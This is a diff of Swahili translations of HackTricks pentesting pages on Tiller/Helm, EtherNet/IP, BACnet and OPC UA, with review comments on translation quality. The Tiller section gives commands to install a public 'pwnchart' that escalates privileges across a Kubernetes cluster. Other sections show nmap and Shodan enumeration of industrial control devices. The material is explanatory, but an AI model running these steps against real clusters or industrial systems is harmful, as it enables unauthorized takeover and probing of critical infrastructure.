3. **Sanidi vibali vya Tiller**: Hakikisha kuwa vibali vya Tiller vimesanidiwa kwa usahihi ili kuzuia ufikiaji usioidhinishwa.
4. **Tumia usimbuaji wa trafiki**: Tumia usimbuaji wa trafiki kati ya Tiller na Kubernetes API server ili kuzuia kuingiliwa kwa trafiki na kudhibiti mawasiliano.
Kwa kuzingatia hatua hizi za kuzuia, unaweza kusaidia kulinda mfumo wako wa Kubernetes na kuzuia mashambulizi ya Tiller.
Mifano:
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
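Review bot: removing the inserted `# Pentesting Tiller (Helm)` essay (`**Swahili Translation:**` through `Kwa kuzingatia hatua hizi za kuzuia, ...`) is right: it duplicated the page's own enumeration section with generic advice and claimed that Tiller uses gRPC to talk to the Kubernetes API server, which conflicts with the rest of the page, where port 44134 is what the `helm --host tiller-deploy.kube-system:44134` client talks to. Since the `Mifano:` lead-in goes with it, the `kubectl get pods -n kube-system` output block now follows the previous fenced block with no introduction; a one-line lead such as `Example output:` would restore the flow.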
@ -77,39 +46,39 @@ NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S)
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
```
Unaweza pia jaribu kupata huduma hii kwa kuangalia bandari 44134 inayotumika:
Unaweza pia kujaribu kupata huduma hii ikifanya kazi ukikagua bandari 44134:
```bash
sudo nmap -sS -p 44134 <IP>
```
Baada ya kuigundua, unaweza kuwasiliana nayo kwa kupakua programu ya mteja ya helm. Unaweza kutumia zana kama `homebrew`, au angalia [**ukurasa rasmi wa matoleo**](https://github.com/helm/helm/releases)**.** Kwa maelezo zaidi, au chaguo nyingine, angalia [mwongozo wa ufungaji](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Mara tu umepata, unaweza kuwasiliana nayo kwa kupakua programu ya mteja helm. Unaweza kutumia zana kama `homebrew`, au angalia [**ukurasa rasmi wa toleo**](https://github.com/helm/helm/releases)**.** Kwa maelezo zaidi, au kwa chaguzi nyingine, angalia [mwongozo wa usakinishaji](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Kisha, unaweza **kutambua huduma**:
Kisha, unaweza **kuorodhesha huduma**:
```
helm --host tiller-deploy.kube-system:44134 version
```
## Kupandisha Uthamani
## Privilege Escalation
Kwa chaguo-msingi, **Helm2** ilisakinishwa katika **namespace kube-system** na **uthamani wa juu**, kwa hivyo ikiwa utapata huduma hiyo na una ufikiaji wake, hii inaweza kukuruhusu **kupandisha uthamani**.
Kwa default **Helm2** ilifungwa katika **namespace kube-system** ikiwa na **mamlaka ya juu**, hivyo ikiwa utapata huduma hiyo na una ufikiaji wake, hii inaweza kukuruhusu **kuinua mamlaka**.
Unachohitaji kufanya ni kusakinisha pakiti kama hii: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) ambayo itampa **ufikiaji wa alama ya huduma ya chaguo-msingi kwa kila kitu katika kikundi kizima.**
Unachohitaji kufanya ni kufunga kifurushi kama hiki: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) ambacho kitatoa **ufikiaji wa token ya huduma ya default kwa kila kitu katika klasta nzima.**
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
Katika [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) una **maelezo ya shambulio**, lakini kwa msingi, ikiwa unasoma faili [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) na [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) ndani ya _helm-tiller-pwn/pwnchart/templates/_ unaweza kuona jinsi **mamlaka zote zinavyotolewa kwa token ya chaguo-msingi**.
Katika [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) una **maelezo ya shambulio**, lakini kimsingi, ukisoma faili [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) na [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) ndani ya _helm-tiller-pwn/pwnchart/templates/_ unaweza kuona jinsi **haki zote zinavyotolewa kwa token ya kawaida**.
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
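Review bot: the install command near the end of the hunk is broken across two lines: `helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn` is followed by `/pwnchart` on its own line, so the chart path reads as a separate command when copied; it should be the single argument `helm-tiller-pwn/pwnchart` on one line. The fences around `helm --host tiller-deploy.kube-system:44134 version` and around the clone/install commands also lack the `bash` tag that the `nmap` block above them uses. In the new footer, "tufuatilie" differs from "tufuate", which every other footer in this commit uses for "follow us"; pick one.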

@ -1,28 +1,29 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Taarifa za Itifaki**
# **Taarifa ya Protokali**
EtherNet/IP ni **itifaki ya mtandao wa Ethernet ya viwandani** inayotumiwa kawaida katika **mifumo ya udhibiti wa kiotomatiki ya viwandani**. Iliundwa na Rockwell Automation katika miaka ya 1990 na inasimamiwa na ODVA. Itifaki hii inahakikisha **ushirikiano wa mfumo kutoka kwa wauzaji tofauti** na hutumiwa katika matumizi mbalimbali kama vile **mitambo ya kusindika maji**, **vituo vya utengenezaji**, na **huduma za umma**. Ili kutambua kifaa cha EtherNet/IP, ombi hutumwa kwa **TCP/44818** na **Ujumbe wa Kitambulisho cha Orodha (0x63)**.
EtherNet/IP ni **protokali ya mtandao wa Ethernet wa viwanda** inayotumika sana katika **mifumo ya udhibiti wa automatisering wa viwanda**. Ilitengenezwa na Rockwell Automation mwishoni mwa miaka ya 1990 na inasimamiwa na ODVA. Protokali hii inahakikisha **uendeshaji wa mifumo ya wauzaji wengi** na inatumika katika matumizi mbalimbali kama vile **mimea ya usindikaji wa maji**, **vifaa vya utengenezaji**, na **huduma za umma**. Ili kubaini kifaa cha EtherNet/IP, ombi linawekwa kwa **TCP/44818** na **ujumbe wa Orodha ya Vitambulisho (0x63)**.
**Bandari ya chaguo-msingi:** 44818 UDP/TCP
**Bandari ya kawaida:** 44818 UDP/TCP
```
PORT STATE SERVICE
44818/tcp open EtherNet/IP
```
# **Uthibitishaji**
# **Uhesabu**
```bash
nmap -n -sV --script enip-info -p 44818 <IP>
pip3 install cpppo
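Review bot: the new protocol paragraph contains "automatisering", which is Dutch, not Swahili (the old line had "kiotomatiki"), and "mimea ya usindikaji wa maji" uses "mimea" in its botanical sense; the "water processing plants" meant here are facilities, so the old "mitambo" was the right word. The new line also changes "katika miaka ya 1990" to "mwishoni mwa miaka ya 1990" (late 1990s); the two versions state different dates, so check which one the English source gives before merging. The heading "Uhesabu" (counting) for Enumeration is weaker than a term like "Uorodheshaji", and the same choice recurs in the BACnet file of this commit.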
@ -33,16 +34,17 @@ python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity
* `port:44818 "jina la bidhaa"`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
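Review bot: the Shodan filter `port:44818 "jina la bidhaa"` has had its quoted string translated; Shodan matches that string literally against banners, so translating the placeholder "product name" changes what the query searches for. Keep the search string as in the English source and, if a hint is wanted, explain the placeholder in prose outside the query. The footer in this hunk also keeps the three new bullets in English ("Check the subscription plans", "Join the Discord group", "Share hacking tricks") while the first file of this commit translates them; the commit should do one or the other consistently.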

@ -1,30 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa za Itifaki
# Taarifa ya Protokali
**BACnet** ni **itifaki ya mawasiliano** kwa mitandao ya Udhibiti na Uendeshaji wa Majengo (BAC) ambayo inatumia **itifaki ya kiwango cha ASHRAE**, **ANSI**, na **ISO 16484-5**. Inarahisisha mawasiliano kati ya mifumo ya udhibiti na uendeshaji wa majengo, ikiruhusu matumizi kama udhibiti wa HVAC, udhibiti wa taa, udhibiti wa ufikiaji, na mifumo ya kugundua moto kubadilishana habari. BACnet inahakikisha uwezo wa kufanya kazi pamoja na kuruhusu vifaa vya kiotomatiki vya udhibiti wa majengo kuzungumza, bila kujali huduma maalum wanazotoa.
**BACnet** ni **protokali ya mawasiliano** kwa ajili ya Mitandao ya Usimamizi na Udhibiti wa Majengo (BAC) inayotumia **ASHRAE**, **ANSI**, na **ISO 16484-5 standard** protokali. Inarahisisha mawasiliano kati ya mifumo ya usimamizi na udhibiti wa majengo, ikiruhusu programu kama vile udhibiti wa HVAC, udhibiti wa mwanga, udhibiti wa ufikiaji, na mifumo ya kugundua moto kubadilishana taarifa. BACnet inahakikisha ufanisi wa kazi pamoja na kuruhusu vifaa vya usimamizi wa majengo vilivyokamilishwa na kompyuta kuwasiliana, bila kujali huduma maalum wanazotoa.
**Bandari ya chaguo:** 47808
**Bandari ya kawaida:** 47808
```text
PORT STATE SERVICE
47808/udp open BACNet -- Building Automation and Control NetworksEnumerate
```
# Uchambuzi
# Uhesabu
## Kwa Mkono
## Mikono
```bash
pip3 install BAC0
pip3 install netifaces
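Review bot: the nmap output line `47808/udp open BACNet -- Building Automation and Control NetworksEnumerate` has the following section's word "Enumerate" fused onto the end of the service description; this is program output and should end at "Networks". The subsection heading "Mikono" means "hands"; the old "Kwa Mkono" (by hand) is the correct rendering of "Manual". In the protocol paragraph, "ufanisi wa kazi pamoja" reads as "efficiency of working together" rather than interoperability, and "vilivyokamilishwa na kompyuta" (completed by a computer) is a mistranslation of "computerized"; the old "vifaa vya kiotomatiki" was closer.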
@ -50,7 +51,7 @@ print(f"Version: {readDevice[2]}")
```bash
nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 <IP>
```
Hati hii haina jaribio la kujiunga na mtandao wa BACnet kama kifaa cha kigeni, badala yake inatuma maombi ya BACnet moja kwa moja kwa kifaa chenye anwani ya IP.
This script does not attempt to join a BACnet network as a foreign device, it simply sends BACnet requests directly to an IP addressable device.
## Shodan
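Review bot: the Swahili sentence "Hati hii haina jaribio la kujiunga na mtandao wa BACnet kama kifaa cha kigeni..." is replaced by its English original "This script does not attempt to join a BACnet network as a foreign device..."; in a translation commit that is a regression, so the Swahili line should be kept (or retranslated) rather than dropped. When retranslating, "skripti" is the usual term for a script; "Hati" normally means a document or certificate.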
@ -59,16 +60,17 @@ Hati hii haina jaribio la kujiunga na mtandao wa BACnet kama kifaa cha kigeni, b
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
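Review bot: the footer in this hunk is mixed-language: the two "Jifunze na fanya mazoezi" hint lines are Swahili while the three bullets ("Check the subscription plans", "Join the Discord group", "Share hacking tricks") stay English, and the header hunk of the same file above has the hint lines in English. Use one language for all footer lines within a file.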

@ -1,60 +1,62 @@
# 4840 - Pentesting OPC UA
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**OPC UA**, ikimaanisha **Open Platform Communications Unified Access**, ni itifaki muhimu ya chanzo wazi inayotumiwa katika viwanda mbalimbali kama vile Uzalishaji, Nishati, Anga, na Ulinzi kwa kubadilishana data na kudhibiti vifaa. Inawezesha vifaa kutoka wauzaji tofauti kuwasiliana, hasa na PLCs.
**OPC UA**, inamaanisha **Open Platform Communications Unified Access**, ni protokali muhimu ya chanzo wazi inayotumika katika sekta mbalimbali kama vile Utengenezaji, Nishati, Anga, na Ulinzi kwa ajili ya kubadilishana data na kudhibiti vifaa. Inaruhusu vifaa vya wauzaji tofauti kuwasiliana, hasa na PLCs.
Usanidi wake unaruhusu hatua kali za usalama, lakini mara nyingi, kwa utangamano na vifaa vya zamani, hatua hizi hupunguzwa, na hivyo kuweka mifumo katika hatari. Aidha, kupata huduma za OPC UA inaweza kuwa ngumu kwani skana za mtandao huenda zisizigundue ikiwa ziko kwenye bandari zisizostahili.
Mipangilio yake inaruhusu hatua kali za usalama, lakini mara nyingi, ili kuendana na vifaa vya zamani, hizi hupunguzwa, na kuweka mifumo katika hatari. Zaidi ya hayo, kupata huduma za OPC UA kunaweza kuwa ngumu kwani skana za mtandao zinaweza kutoweza kuzitambua ikiwa ziko kwenye bandari zisizo za kawaida.
**Bandari ya chaguo-msingi:** 4840
**Bandari ya kawaida:** 4840
```text
PORT STATE SERVICE REASON
4840/tcp open unknown syn-ack
```
## Pentesting OPC UA
Ili kugundua masuala ya usalama katika seva za OPC UA, skani kwa kutumia [OpalOPC](https://opalopc.com/).
Ili kufichua masuala ya usalama katika seva za OPC UA, scan na [OpalOPC](https://opalopc.com/).
```bash
opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port
```
### Kudukua udhaifu
### Kutumia udhaifu
Ikiwa udhaifu wa kuthibitisha utambulisho unapatikana, unaweza kusanidi [mteja wa OPC UA](https://www.prosysopc.com/products/opc-ua-browser/) kulingana na hilo na kuona unaweza kupata nini. Hii inaweza kuruhusu kusoma tu thamani za mchakato au hata kufanya kazi na vifaa vya viwandani vya kazi nzito.
Ikiwa udhaifu wa kupita uthibitisho umepatikana, unaweza kuunda [mteja wa OPC UA](https://www.prosysopc.com/products/opc-ua-browser/) ipasavyo na kuona unachoweza kufikia. Hii inaweza kuruhusu chochote kutoka kwa kusoma tu thamani za mchakato hadi kufanya kazi na vifaa vya viwandani vya nguvu.
Ili kupata wazo la kifaa unachoweza kupata, soma thamani za nodi ya "ServerStatus" katika nafasi ya anwani na tafuta kwenye Google kwa mwongozo wa matumizi.
Ili kupata wazo la kifaa unachofikia, soma thamani za nodi "ServerStatus" katika nafasi ya anwani na utafute mwongozo wa matumizi.
## Shodan
* `port:4840`
## Marejeo
## Marejeleo
* [https://opalopc.com/how-to-hack-opc-ua/](https://opalopc.com/how-to-hack-opc-ua/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
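Review bot: the heading "## Basic Information" is left in English (replacing the translated "## Taarifa Msingi") while "## Marejeleo" and the rest of the body are translated; either keep all section headings in one language or note in the commit message which ones stay English. In the footer, "fuata sisi kwenye Twitter" is a word-for-word "follow us" that reads oddly next to the "tufuate" used elsewhere in this commit.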

@ -1,20 +1,21 @@
# 49 - Kupima Usalama wa TACACS+
# 49 - Pentesting TACACS+
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
